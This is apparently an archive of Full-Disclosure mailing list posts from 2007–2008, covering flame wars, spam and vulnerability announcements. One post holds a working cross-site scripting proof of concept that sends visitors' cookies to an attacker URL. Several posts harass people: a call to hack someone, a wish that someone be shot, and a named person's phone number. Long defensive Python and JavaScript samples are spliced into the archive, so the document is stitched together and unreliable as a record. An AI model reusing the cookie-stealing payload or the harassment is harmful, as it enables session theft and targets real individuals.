   Indian-Pakistan war is about to kick off folks...
  
   http://news.bbc.co.uk/1/hi/world/south_asia/7757031.stm
 
  I know it's not going to happen, but can I request you once again shut
  the fuck up about events that you have no clue about?
 
  At least try to keep your sensationalist retarded drivel to your own
  backyard.
 
 
  Although a knee-jerk reaction, this post has some value.
 
  The tensions between the countries is on the rise, and the recent
  blasts
 in
  Bangalore would increase the chances of war. BTW, does anyone have an
 idea
  on what kind of cyber-warfare is currently underway between the two
 nations?
 
  --
  MC
 
  There was a report earlier in the week via pcworld.com, but I don't
  think its connected to this conflict, maybe just a coincidence:
 
 
 http://www.pcworld.com/businesscenter/article/154544/feuding_india_pakistani_hackers_deface_web_sites.html
 

 Thanks. I'm looking into this and will report on any further info.

 --
 MC





 --
 http://www.astorandblack.com/

 http://www.jewelerslounge.com/liberty-coin-cufflinks



-- 
I'm your best best friend.

Usually I like it when you contradict me, it might help me learn. Just
don't be so angry.



Re: [Full-disclosure] Lazy bum approach to security

2008-11-29 Thread Some Guy Posting To Full Disclosure
Hi

I agree with you. It's just these 'underground communities' tend to be
a bunch of kiddies playing with milw0rm, bots, and asking help with
basic programming.

Where's the original ideas, the research, and the worth-while discussion?

I guess I described an extreme scenario, but you get the picture.

Really, tell me. If there was a friendly, 'academic' (as opposed to
'business-like') online community then show me, I'd join up in a
flash.

-- 
I'm your best best friend.

Usually I like it when you contradict me, it might help me learn. Just
don't be so angry.



Re: [Full-disclosure] Security industry software license

2008-11-29 Thread Some Guy Posting To Full Disclosure
Just to summarise what's been said and what I think so we can get back
on topic, and conclude something:

No-one hacks using metasploit! Go back to 2003.
Terrorists with metasploit! What to you have a picture in your head of
Mr. Jihad Bigbeard using metasploit to shutdown a powergrid?

Reasons Why It's Hard to achieve:
 - It violates freedom.
 - It's hard to enforce without: invading privacy, expending too much
money/resources.
 - Most writers of these tools won't want to have to do this (most
writers of security tools are hackers, you-know: back orifice, pinch,
exploit kits, phishing kits, malware creation kits, the entire contents
of milw0rm, bots, THC's Hydra... it goes on).
 - Geographical constraints. All governments doing the exact same
thing at the same time? Or one organisation forcing it onto the net
(with no power to put people in jail or anything).
 - You can't/shouldn't moderate the internet.

Reasons Why It's Pointlessly ineffective:
 - Piratebay.
 - People writing tools intended for hackers.
 - The massive number of tools that you'd have to moderate to be effective.
 - If not everything is a dangerous security tool then it's reduced in
effectiveness.
 - Most big hacks you see don't take many tools. Like a big database
being dumped with a browser/scripts.
 - You don't solve the problem, at all. Maybe reduce it a little.


Reasons Why It Wouldn't Happen:
 - Most developed western governments like to keep their 1984 I'm
watching you crap behind the curtains.
 - Most governments only do these things because something bad
happened and they have to make up a law to cover their asses, or
something bigger than your rapidshare passes is at stake.
 - I'd protest - I'd go to my country's (UK) capital and march in protest!

Reasons Why It Sucks:
 - It violates freedom (programs are intellectual property - you can't
do that kind of thing to them and call it nice).
 - It would ruin the internet and break a load of enthusiastic geeks' hearts.
 - It would force the underground hackers deeper underground.
 - It would discourage security professionals.

Pointless things that people mentioned that made them look like a
child in front of a shit load of subscribers:
 - Personal comments.
 - Attacks at the way someone writes something instead of what they write about.

Questions to think about/answer:
 - Would you deserve a license. Really? (me: NO!)
 - Would you wish you had one. (me; yeh!)
 - How many of the tools that'd be outlawed have you already written
an equivalent of? (me: loads).
 - If you had to outlaw things, would you outlaw tor? (me: I don't wanna!)


It's a silly idea.
Final Question:
 - Are we finished? Is it over? Is it established that it's a bad idea now?

-- 
I'm your best best friend.



Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?

2008-11-04 Thread Some Guy Posting To Full Disclosure
It's futile trying to use the law to change things.
It will simply force people into the shadows. Which today involves
using tor and some Russian web money account.

I read a slogan from before my time, in a book: If source is outlawed
outlaws will have source - same applies to zero days.

Anyway I don't think it should be Illegal. I own a set of lock picks -
I don't intend to break into someone's house. And if I did I'd go to
jail (for the burglary and being equipped with picks), until then I'm
innocent. The UK's law has an attitude like that - I like it!
Resources should go into actually preventing crimes taking place. Not
stumbling around hoping that making it awkward for criminals to get
the tools they need will make a difference.

Simon.



Re: [Full-disclosure] scada/plc gear

2008-01-07 Thread full disclosure
There's a ton of information on the Internet for Schneider/Modicon's modbus
protocol, including modbus+, modbusrtu, and modbustcp...  Specs are freely
available: http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b.pdf.
If you spend 2 minutes with google you'll find more than you'll need.  For
example: http://www.modbus.pl/download/zxy66/v19/modbus_perl_client.zip.
Anyways, enjoy your research...


On Jan 5, 2008 1:01 PM, gmaggro [EMAIL PROTECTED] wrote:

 OK, having done some digging a decent little chunk of industrial
 automation gear has started coming my way; 1 of 6 pieces. All totaled,
 roughly under $1000. Small standalone stuff for now; the shipping on
 populated PLC chassis like SLC-500 stuff is problematic.

 If people have specific technical questions, want a script run against a
 piece of gear or a custom protocol capture done I will entertain such
 requests. I am also willing to open the cases and pick up the soldering
 iron, attempt rom/firmware dumps, etc.

 Are there any particular tests or tools someone would like me to work
 into my routine right from the start?

 Hardware piece #1 is a Kohler Power Systems modbus/ethernet converter,
 pn# GM40165.

 So far, nmap (4.52) has been detecting the modbus running on port
 502/tcp as asa-appl-proto. There is not a great deal of information out
 there about this protocol. The email contact associated with the port in
 some /etc/services files ([EMAIL PROTECTED]) is disabled, and the domain
 redirects to an industrial automation company (telemecanique.com).
 Running/OS details indicate Enerdis or Lantronix embedded. MAC prefix is
 00:20:4A (Pronet Gmbh). I suppose I could have just posted the nmap
 output, but figured that might annoy people unduly.

 Perhaps it would be worth renaming 'asa-appl-proto' on 502 to 'modbus'
 or something related? Just a suggestion to make it clearer for some
 people. In any case, this is mitigated by scanning with the -C option
 which grabs info from 80 and 161 clearly identifying it as being a
 modbus related device, the sysDescr stating Modbus/TCP to RTU Bridge.
 And oh yeah, it has a wide open text configuration interface on .

 Handy/Interesting modbus tcp/udp links:

 http://jamod.sourceforge.net/development/tcp_master_howto.html
 http://jamod.sourceforge.net/kbase/protocol.html


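
The thread above notes that nmap labels 502/tcp as asa-appl-proto. A monitoring script can confirm that captured traffic on that port really is Modbus/TCP by validating the MBAP header described in the published specification. This is an added example, not code from the thread; the sample bytes and all function and class names are constructed for illustration.

```python
import struct
from dataclasses import dataclass

MBAP_LEN = 7            # transaction id, protocol id, length, unit id
MAX_LENGTH_FIELD = 254  # unit id (1 byte) + PDU (at most 253 bytes)

FUNCTION_NAMES = {
    0x01: "Read Coils",
    0x02: "Read Discrete Inputs",
    0x03: "Read Holding Registers",
    0x04: "Read Input Registers",
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
}
WRITE_FUNCTIONS = {0x05, 0x06, 0x0F, 0x10}


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function: int       # function code with the exception bit cleared
    is_exception: bool  # True when the server answered with an error
    data: bytes         # PDU bytes after the function code

    @property
    def name(self) -> str:
        return FUNCTION_NAMES.get(self.function, f"Function 0x{self.function:02X}")

    @property
    def is_write(self) -> bool:
        return self.function in WRITE_FUNCTIONS


def parse_stream(buf: bytes):
    """Split a TCP payload into Modbus/TCP frames.

    Returns (frames, leftover). leftover holds a trailing partial frame
    that needs more bytes. Raises ValueError when the header fields
    cannot belong to Modbus/TCP.
    """
    frames = []
    offset = 0
    while len(buf) - offset >= MBAP_LEN:
        tid, proto, length, unit = struct.unpack_from(">HHHB", buf, offset)
        if proto != 0:
            raise ValueError(f"protocol id {proto:#06x} is not Modbus (expected 0)")
        if not 2 <= length <= MAX_LENGTH_FIELD:
            raise ValueError(f"length field {length} outside 2..{MAX_LENGTH_FIELD}")
        end = offset + 6 + length  # length counts the bytes after the length field
        if end > len(buf):
            break                  # truncated frame: keep it as leftover
        code = buf[offset + MBAP_LEN]
        frames.append(ModbusFrame(tid, unit, code & 0x7F, bool(code & 0x80),
                                  buf[offset + MBAP_LEN + 1:end]))
        offset = end
    return frames, buf[offset:]


def is_modbus_tcp(payload: bytes) -> bool:
    """True when the payload starts with at least one well-formed frame."""
    try:
        frames, _ = parse_stream(payload)
    except ValueError:
        return False
    return bool(frames)


# Constructed sample: a read request, a write request and an exception reply.
SAMPLE_CAPTURE = bytes.fromhex(
    "000100000006" "01" "03" "00000002"   # Read Holding Registers, 2 registers
    "000200000006" "01" "06" "001000ff"   # Write Single Register 0x0010 = 0x00FF
    "000300000003" "01" "83" "02"         # Exception reply to function 0x03
)

if __name__ == "__main__":
    for frame in parse_stream(SAMPLE_CAPTURE)[0]:
        kind = "EXCEPTION" if frame.is_exception else ("WRITE" if frame.is_write else "read")
        print(frame.transaction_id, frame.unit_id, frame.name, kind, frame.data.hex())
```

Flagging frames where is_write is true gives a simple starting point for alerting on unexpected writes to a bridge like the one described in the quoted post.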

Re: [Full-disclosure] mac trojan-vs-USERS

2007-11-02 Thread full-disclosure



On Fri, 02 Nov 2007 00:09:33 -0400 RMueller [EMAIL PROTECTED]
wrote:
of there OS. Move a folder and all programs are gone! Regardless

their

Or, can we educate?

trying.


thanks

np.


Re: [Full-disclosure] IRM Discover More Vulnerabilities in Cisco IOS

2007-10-23 Thread full-disclosure

shut up pdp

On Tue, 23 Oct 2007 14:31:52 -0400 reepex [EMAIL PROTECTED] wrote:

Bug 1:
The Line Printer Daemon, which provides print server
functionality in
Cisco IOS is vulnerable to a software flaw whereby the length of
the
hostname of the router is not checked before being copied into a
fixed
size memory buffer. . However, the attacker must be able to
control the hostname of the router, which could be achieved via
SNMP.

Ok... so for this remote attack the victim would need a badly
configured snmp listening public... ok pdp architect

---
Bug 2:
Cisco say its cross-site scripting

Ok you are still stealing pdp architect's research
---

Bug 3-7,10-15
Local attacks on a cisco - lulz

Not even pdp would go this low
---

Bug 8,9: no info - im sure its elite though

Having a bug but releasing no info - sounds like drraid and pdp
architec to me

-

so basically you found a bunch of local bugs in ciscos and a bug if
you can control snmp - way to go - your grep -r strcpy * skills are
quite strong. Eeye and idefense would gladly hire you.

Do you wonder why you found 12 bugs and get no press but michael
lynn
finds a couple and cisco is throwing lawyers and lawsuits at him? -
--
its probably because his mattered and yours are a joke - just like
you
and your company.


On 10/23/07, Andy Davis [EMAIL PROTECTED] wrote:
 In the last three months IRM has discovered a total of 13 new
security
 vulnerabilities in Cisco IOS. These vulnerabilities were
reported to
 Cisco and have all been allocated PSIRT reference numbers while
the root
 cause and potential impact of each is investigated. Cisco has
taken all
 the vulnerability reports extremely seriously and has already
started
 releasing patches and workarounds to mitigate them (e.g.
 http://www.cisco.com/warp/public/707/cisco-sr-20071010-lpd.shtml). As
 the remaining patches or workarounds are developed, IRM will
release
 security advisories, which will include full technical details
of each
 vulnerability and links to patch download information.

 More information about the new vulnerabilities discovered is
available
 here:

 http://www.irmplc.com/index.php/111-Vendor-Alerts




Re: [Full-disclosure] Madness? This is KWICKFIX!!!!!!

2007-10-20 Thread full-disclosure

I did not get this spam.  Perhaps my internet relay mail provider
does a better job of xss firewalling me from spam.

On Sat, 20 Oct 2007 15:27:57 -0400 phioust [EMAIL PROTECTED]
wrote:
did anyone else get this? I am only signed up for this list so I
figured it was 'targeted spam'

On 10/20/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

 Have you searched the internet countless times looking for a way
to
 hack? Maybe you have searched for a way to download programs,
games, or
 movies for free? Or maybe you have searched for a friendly,
helpful,
 community that offers all that plus more? Well search no more,
you have
 struck gold. Well not quite gold, better… Kwickfix.org! Here at
 Kwickfix.org we have forums for countless discussions to be held
daily. We
 have a 'warez' section with endless amounts of safe secure
downloads for
 your favorite TV shows, Movies, Games, Programs, and more. But
what we
 really are known for is not our download section, but our
notorious
 underground hacking section. Hack online games, your friends,
and get
 passwords to any site! We offer numerous easy to follow
tutorials and
 programs for you to become a 'hacker' in no time. Don't believe
us? Why not
 come to Kwickfix.org and see for yourself. Stuck on a problem?
Ask any of
 our staff members or a tech genius member. Thanks, The Kwickfix
Management

[Full-disclosure] Cross Site Hacking Browser Injection Attack Vulnerability Paradigms

2007-10-20 Thread full-disclosure

Hello friends,

I am a PhD student writing my dissertation on cross site scripting
related attacks, which I have learned is the true Achilles heel of
Intraweb exploration technologies.  One detail I am unable to find
with the assistance of the Internet Wayback machine is when and
what browsers first introduced these vulnerabilities.

So,

1) What browser was first vulnerable to these attacks,
2) Who was the responsible developer,
3) How was this vulnerable mechanism replicated across all modern
browsers,
4) Instead of patching individual XSS problems in random web-based
piano tuning software, why aren't the serious security
researchers[1] of this list working to develop better technologies
to block the entire vulnerability class, like the PaX/w^x team has
done[2], to raise the ante for computer security list posters
around the world?

Thanks for your help in advance.


Re: [Full-disclosure] Cross Site Hacking Browser Injection Attack Vulnerability Paradigms

2007-10-20 Thread full-disclosure

lol what a blonde i forgot my citations one second

[1] http://www.gnucitizen.org
[2] http://pax.grsecurity.net

Thanks!

On Sat, 20 Oct 2007 15:46:36 -0400 [EMAIL PROTECTED]
wrote:
Hello friends,

I am a PhD student writing my dissertation on cross site scripting
related attacks, which I have learned is the true Achilles heel of
Intraweb exploration technologies.  One detail I am unable to find
with the assistance of the Internet Wayback machine is when and
what browsers first introduced these vulnerabilities.

So,

1) What browser was first vulnerable to these attacks,
2) Who was the responsible developer,
3) How was this vulnerable mechanism replicated across all modern
browsers,
4) Instead of patching individual XSS problems in random web-based
piano tuning software, why aren't the serious security
researchers[1] of this list working to develop better technologies
to block the entire vulnerability class, like the PaX/w^x team has
done[2], to raise the ante for computer security list posters
around the world?

Thanks for your help in advance.


Re: [Full-disclosure] Marc Vilanova Vilasero is out of the office.

2007-10-19 Thread full-disclosure

Someone hack this guy.

- -JPauthority

On Fri, 19 Oct 2007 10:01:27 -0400 Marc Vilanova Vilasero
[EMAIL PROTECTED] wrote:
I will be out of the office from 19/10/2007 and will not return until
26/10/2007.

I will reply to your message when I return.


[Full-disclosure] PhD Power in Efffect

2007-10-19 Thread full-disclosure

http://www.securityfocus.com/columnists/455

Luckily he is only a PhD student.  If anyone awards him a PhD it
will severely discredit the academic institution!

- -JPiwishsomeonemadethatmistakeonme


Re: [Full-disclosure] Netgear SSL312 XSS vulnerability

2007-10-19 Thread full-disclosure

Dear 3APAPA,

English is the preferred language of this list.  I hope the FSB
shoots you.

- -JPhopes the FSB kills 3APAPA

On Fri, 19 Oct 2007 06:04:31 -0400 jpk [EMAIL PROTECTED]
wrote:
[EMAIL PROTECTED] wrote:
 What?

One word replies are unnecessary on the full-disclosure. Please visit
http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066799.html
for more information. :p


Re: [Full-disclosure] Netgear SSL312 XSS vulnerability

2007-10-19 Thread full-disclosure

LOL!

- -JPuncreative today

On Thu, 18 Oct 2007 13:06:25 -0400 Lolek of TK53
[EMAIL PROTECTED] wrote:
Yoyo,
On 10/17/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 Dear SkyOut, dear Packetstorm team (tedd :)) and dear List.

 The author broke an NDA during the releasing of this uber-Advisory.

 Skyout: What the fuck is wrong with u? Even ignoring our
mails... wow?
 We provided the Router, told him to take a look and he agreed
to an NDA.

 Do I care if you release a XSS? Hell no...
 But I care if you accepted an NDA because of other internal
things.

 Did you find it by yourself? Well not really... (We provided a
router,
 told you to take a look for XSS) Is it uber-critical?

Lol whoever you are, you are going to do an NDA for an XSS in a
router
firmware web interface?
I fail to see a real security issue ;D
Cheers
Lolek



Re: [Full-disclosure] Gmail 1.1.0 for BlackBerry remote DoS

2007-10-19 Thread full-disclosure

Anyone have Geoff's gmail address?

- -JPgetting malicious

On Fri, 19 Oct 2007 04:39:44 -0400 Kristian Erik Hermansen
[EMAIL PROTECTED] wrote:
I have tested and confirmed this bug on a BlackBerry 8700c in a
repeatable fashion.  Three outcomes are common (so may be race
condition)...

1) Entire BlackBerry OS freeze. (On soft-reboot, you will see the
uncaught Java exception for Gmail app)
2) Gmail freezes for some time, and then OS can recover (Gmail not
responding, and killed)
3) Or no DoS at all (if you are lucky)

Here is the message you will get...
Uncaught exception: Application gm_8700_v4_0_L1(147) is not
responding; process terminated

The way I have commonly invoked this is to send an email of at least
20k in size to Exchange-synced email address on the same device.  If
the user has Gmail account open, it is more likely to go into DoS
condition if you are composing an email or replying to a large thread.
Maybe this is due to Gmail trying to auto-save the draft at the same
time and hanging?  Also, how is the hacker community debugging
BlackBerry apps for security issues?  ie, can I remotely debug the
processes via USB on the 8700c?

Thanks in advance...

PS -- Oh, I just thought that since we are talking about BlackBerry, I
should mention another funny bug, but not a security issue.  It has to
do with multi-byte character manipulation...

Tested on 8700c v4.2.1.96 (Platform 2.3.0.79).  Follow these steps to
reproduce the Arabic array index out of bounds exception when making a
phone call...

Home - Settings - Options - Language - Change Option - Arabic
(funky chars, top item in list) - Save
Home - [do this next part quickly] tap 9, tap 0 quickly twice, while
char is still highlighted tap DEL.
Uncaught exception: java.lang.StringIndexOutOfBoundsException
--
Kristian Erik Hermansen



Re: [Full-disclosure] password plugin for linux?

2007-10-19 Thread full-disclosure

Wow.  Most *constructive* comment you have ever made in your
history of security mailing list participation.  And you still suck.

- -JPhates vladis

On Thu, 18 Oct 2007 16:35:22 -0400 [EMAIL PROTECTED] wrote:
On Thu, 18 Oct 2007 10:11:24 CDT, . / said:

 naive question - but you know how i can load password plugins in
 window's to capture password changes in the clear. is there any way
 to achieve the same in linux? atm all i can think of (naively as i
 said) is to monitor the shadow file or whatever and then insert fav
 technique here to open the hash. but i am really trying to achieve a
 near realtime understanding of password changes on the system side,
 so i can sync them out to apps or systems or whatever.

Modifying pam_cracklib to do what you want is probably a good place to
start.


Re: [Full-disclosure] Creative spam

2007-10-19 Thread full-disclosure

Dear 3APAPA,

This list is for security related matters only.

- -JPhas a computer

On Fri, 19 Oct 2007 07:43:02 -0400 S/U/N [EMAIL PROTECTED] wrote:
/!\ NOT properly a security topic /!\

Received a very strange spam (1st with MP3 attached).
The file seems harmless, until you listen to it: It takes you back to
the beat Generation experiments on consciousness.

The file: http://www.mediafire.com/?5ljtvtvq9xt

//-
-
 From - Fri Oct 19 13:24:06 2007

Return-Path: [EMAIL PROTECTED]
Received: (qmail 27615 invoked from network); 18 Oct 2007 19:48:36
-
+++
From: Hilda Hull [EMAIL PROTECTED]
To: XXX
Subject: Re:
Date: Thu, 18 Oct 2007 15:48:15 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary==_NextPart_000_001C_01C8119E.4B8B8980
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Antivirus-Status: Clean

--=_NextPart_000_001C_01C8119E.4B8B8980
Content-Type: multipart/alternative;
boundary==_NextPart_001_001D_01C8119E.4B8FA830


--=_NextPart_001_001D_01C8119E.4B8FA830
Content-Type: text/plain;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable


--=_NextPart_001_001D_01C8119E.4B8FA830
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN
HTMLHEAD
META http-equiv=3DContent-Type content=3Dtext/html; =
charset=3Diso-8859-1
META content=3DMSHTML 6.00.2800.1106 name=3DGENERATOR
STYLE/STYLE
/HEAD
BODY bgColor=3D#ff
DIVFONT face=3DArial size=3D2/FONTnbsp;/DIV/BODY/HTML

--=_NextPart_001_001D_01C8119E.4B8FA830--

--=_NextPart_000_001C_01C8119E.4B8B8980
Content-Type: audio/mpeg;
name=moreringers.mp3
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
name=moreringers.mp3

//-
-





Re: [Full-disclosure] Marc Vilanova Vilasero is out of the office.

2007-10-19 Thread full-disclosure

Why are you dragging KF into this?

- -JPsupports nonswearing freespeech

On Fri, 19 Oct 2007 12:25:56 -0400 [EMAIL PROTECTED] wrote:
On Fri, 19 Oct 2007 12:18:06 EDT, [EMAIL PROTECTED]
said:
 Please use age appropriate language on this list.

Pot. Kettle. Black.


Re: [Full-disclosure] Marc Vilanova Vilasero is out of the office.

2007-10-19 Thread full-disclosure

Please use age appropriate language on this list.

Thanks.

On Fri, 19 Oct 2007 08:47:33 -0400 German [EMAIL PROTECTED]
wrote:
 Go fuck yourself
In Spanish is:
Andate a la mierda (not literal)
Cogete/follate vos solo (literal, not used)
 ---
 Vaya usted cogiera

 Hmm, doesn't seem correct.


 Shirkdog
 ' or 1=1--

 http://www.shirkdog.us
[...]
 
  I will be out of the office from 19/10/2007 and will not return
  until 26/10/2007.
 
  I will reply to your message when I return.
Translated is:
I take some vacations and send a mail to all my contacts. This maillist
was there, so you are fucked
PS: when you get back, remove us from your contacts ¬¬'


Re: [Full-disclosure] Serious holes affecting SiteBar 3.3.8

2007-10-19 Thread full-disclosure

Of course the bugs are serious, security is never a joking matter!

- -JPclassic comedian

On Thu, 18 Oct 2007 16:01:35 -0400 Tim Brown [EMAIL PROTECTED]
dimension.org.uk wrote:
All,

As a result of a short security audit of SiteBar, a number of security
holes were found.  The holes included code execution, a malicious
redirect and multiple cases of Javascript injection.

After liaising with the developers, the holes have been patched.
Attached are the advisory and patch relating to these flaws.

CVEs open already relating to this audit:

* CVE-2006-3320 (Javascript injection) - previously reported by other
parties but not resolved and so included for completeness

* CVE-2007-5492 (code execution) - first reported in my attached
advisory to the vendor, independently rediscovered by Robert Buchholz
of Gentoo whilst auditing the differences between the patched and
unpatched versions (3.3.8 vs 3.3.9)

* CVE-2007-5491 (file permissions issue) - apparently patched by the
vendor at the same time as my issues were resolved and discovered by
Robert Buchholz of Gentoo whilst auditing the differences between the
patched and unpatched versions (3.3.8 vs 3.3.9)

It is intended that CVE-2007-5492 will be updated to reference both
code execution flaws I reported.  All other issues in the advisory have
been patched but no CVEs have yet been requested or assigned to the
best of my knowledge.

Tim
--
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/


Re: [Full-disclosure] peace

2007-10-19 Thread full-disclosure

I concur.

- -JPwrote I concur.

On Fri, 19 Oct 2007 04:35:31 -0400 fabio [EMAIL PROTECTED] wrote:
I agree; if it doesn't make any sense to you, feel free to ignore it.
To pretend to understand everything everytime is a common pomposity.

[EMAIL PROTECTED] wrote:
 One word replies are unnecessary on the full-disclosure.

 On Thu, 18 Oct 2007 12:15:52 -0400 Nikolay Kichukov
 [EMAIL PROTECTED] wrote:
 so?

 -Nikolay

 fabio wrote:
 https://intranet.usip.org/datacenter/eps/CustomCal.php



Re: [Full-disclosure] XSS vulnerabilities on eBay, MySpace, CNN.com, etc

2007-10-19 Thread full-disclosure

Dear pdp chell,

What you do in the bathroom is your own business and does not
belong on this mailing list.

- -JPtypes but cannot think

On Thu, 18 Oct 2007 18:25:24 -0400 jgffgjfgd rewrewrew
[EMAIL PROTECTED] wrote:
A cross-site scripting vulnerability has been discovered on multiple
websites which use ads provided by Pointroll.

The following list is a subset of the websites which contain the
vulnerability:
http://www.cnn.com/pointroll/PointRollAds.htm
http://www.myspace.com/pointroll/PointRollAds.htm
http://www.friendster.com/pointroll/PointRollAds.htm
http://archive.gamespy.com/pointroll/PointRollAds.htm
http://www.monster.com/pointroll/PointRollAds.htm
http://www.allmusic.com/pointroll/PointRollAds.htm
http://www.pcworld.com/pointroll/PointRollAds.htm
http://www.10best.com/pointroll/PointRollAds.htm
http://www.askmen.com/pointroll/PointRollAds.htm
http://pages.ebay.com/pointroll/PointRollAds.html

The above pages include a script at pointroll.com which is the root of
the vulnerability. The vulnerability arises from the use of
location.search without sanitizing the query.

The following is a proof of concept which works in Firefox. This should
be placed onto the end of any of the above URLs, obviously. [URL]
should be replaced by your website URL, such as
http://www.foo.com/bar.php, and [LENGTH+1] should be the length of your
website URL + 1.

?pub=[URL]?redir=%27%3E%3Cscript%3Ewindow.location=
location.search.substring(5,[LENGTH+1]).concat(document.cookie
)%3C/script%3Ead=g235e20051011164320
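
The report above attributes the flaw to using location.search without sanitizing the query. As an added example (not PointRoll's script and not part of the original post), the sketch below contrasts that pattern with a handler that validates and encodes the value; the function names, the handling of the `redir` parameter and the allow-listed host are assumptions.

```javascript
// Added example. Function names, the "redir" handling and the allow-listed
// host are assumptions; this is not PointRoll's script.

// Constructed allow-list of hosts the ad may link to.
const ALLOWED_HOSTS = new Set(['ads.example.com']);

// Vulnerable pattern: a value taken from location.search is concatenated
// into markup (for document.write / innerHTML) with no validation or
// encoding, so a quote in the query closes the attribute and the rest of
// the value is parsed as HTML.
function renderAdUnsafe(search) {
  const redir = new URLSearchParams(search).get('redir') || '';
  return "<a href='" + redir + "'>ad</a>";
}

// Encode the characters that are significant in HTML text and in quoted
// attribute values.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Validate before use: the value must parse as an absolute URL, use http(s),
// and point at an allow-listed host. Returns the normalised URL or null.
function parseRedirect(search) {
  const value = new URLSearchParams(search).get('redir');
  if (value === null) return null;
  let url;
  try {
    url = new URL(value); // throws on anything that is not an absolute URL
  } catch {
    return null;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Hardened form: validate first, then encode for the attribute context.
// In a browser, prefer document.createElement('a') and setting a.href to the
// validated URL so that no HTML string is built at all.
function renderAdSafe(search) {
  const href = parseRedirect(search);
  if (href === null) return '<span>ad unavailable</span>';
  return '<a href="' + escapeHtml(href) + '">ad</a>';
}

// Constructed query strings, as window.location.search would present them.
const SAMPLES = {
  expected: '?redir=https%3A%2F%2Fads.example.com%2Fc%3Fa%3D1%26b%3D2',
  breaksOutOfAttribute: '?pub=x&redir=%27%3E%3Cb%20id%3Dinjected%3E&ad=1',
  wrongHost: '?redir=https%3A%2F%2Fother.example%2F',
};

// Run both renderers over every sample so the outputs can be compared.
function demo() {
  const out = {};
  for (const [name, search] of Object.entries(SAMPLES)) {
    out[name] = { unsafe: renderAdUnsafe(search), safe: renderAdSafe(search) };
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```
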


Re: [Full-disclosure] Most Secure Browser

2007-10-18 Thread full-disclosure

That is hardly sporting.

On Thu, 18 Oct 2007 05:23:03 -0400 [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
Could you stfu a moment please thanks , do not reply you're filtered,
motherfucker.

[EMAIL PROTECTED] wrote:

 Thanks bud.

 Incidentally, we have been seeing a lot of s0ftpj.org posts lately -
 is your hacker group trying to make a comeback?  If so, why?

 I think r00tabega should return as well!

 - -JPscene historian is written between my bra and ket lulz!

 On Wed, 17 Oct 2007 19:54:45 -0400 vecna [EMAIL PROTECTED] wrote:

 Hi,

 I am currently tasked with evaluating which webbrowser is the most
 secure, to be deployed across all machines at the fortune 500
 corporation I'm currently working at.  Can you, armchair security
 enthusiast and full-disclosure reader, assist me in this endeavor?

 I am looking for:

 1) Personal favorite browser,

 firefox, for the plugins support


 2) Most secure browser,

 opera, because is the less used at the moment :)


 3) Best browser plugins,

 mixtab


 4) Favorite youtube video,

 what's matter ? is for a psy profiling analysis ?
 anyway:
 http://www.youtube.com/watch?v=K2cYWfq--Nw


 5) Best browsing policies

 a lot of tab (20 - 50) for collect in the day and read after.



 Thanks and good night.

 you too.



Re: [Full-disclosure] Did people power get rid of Gadi Evron from Full-Disclosure?

2007-10-18 Thread full-disclosure

I haven't heard from Gadi since he called Turkey a nation of
Muslim terrorists on his blog.

Has anyone tried calling him?

703-286-7723, extension 110 .

On Wed, 17 Oct 2007 13:43:20 -0400 worried security
[EMAIL PROTECTED] wrote:
Did people power get rid of Gadi Evron from Full-Disclosure?

The security researcher and robot network expert from Israel
hasn't been
seen on Full-Disclosure mailing list since the What is a 0-day?
fallout
between the researcher and members of the security community,
including me,
n3td3v.

Concerns are growing in the security community over Evron's
health, after a
shocking exit from Full-Disclosure mailing list after mass
arguments over
his comments cross posted between Full-Disclosure and the
moderated Bugtraq
mailing list.

On the n3td3v stance, n3td3v did not want Bugtraq moderators to
broadcast
his argument on the Securityfocus based mailing list, because it
was deemed
by n3td3v to be lame and on the bigger picture, the argument
wasn't mission
critical.

n3td3v sees Bugtraq's role to be only for mission critical
discussion to
protect core infrastructure systems from cyber attacks where
economic and
public saftey could be at risk in relation with corporate and
national
security matters.

While Gadi Evron was right to leave Full-Disclosure while tensions
between
security researchers calmed down, n3td3v is now offering Gadi
Evron an olive
branch to return to Full-Disclosure on the basis he keeps the lame
chatter
away from Bugtraq and focuses his career of mailing lists postings
to be
restricted to Full-Disclosure, Funsec, Nanog and any other mailing
list
accept Bugtraq.

Unless he is posting an advisory on behalf of someone else under
the
SecuriTeam or BeyondSecurity brands, he has no place being on
mission
critical list Bugtraq at SecurityFocus.

So Gadi Evron, no hard feelings, we don't hate you, we just wanted
you not
to discuss what you discussed on Bugtraq relating to defining 0-
day.

At the time you may of thought it was a good idea but looking back
you must
see now how lame it was, unless you have mental health issues.

I am your friend Gadi Evron, I respect your work as a robot
network expert
and I want you to return to Full-Disclosure.

If you come back, I will offer you protection, protection to which
I already
offer to *Valdis*.Kletnieks.

What I mean by protection is, if anyone says anything bad about
you, I will
defend you, as long as you're not being uber lame like you were on
Bugtraq
over the defining 0-day thread.

So Gadi Evron, if you want freeway to speak on Full-Disclosure
with n3td3v
backing, I will make sure you get full protection from the
trolls... its
upto you.

You can come back to Full-Disclosure and continue being attacked,
or you can
have my backing and your life will be a whole lot eaiser.

If you return to Bugtraq with more uber lameness, then the deal
will be cut
short, and Full-Disclosure regulars will swallow you up whole.

Remember Gadi Evron, power comes at a price and the price is you
keep off
Bugtraq or expect more public criticism by me, and no protection
from me
when others decide to criticize you,

And don't under estimate the damage done to your self reputation
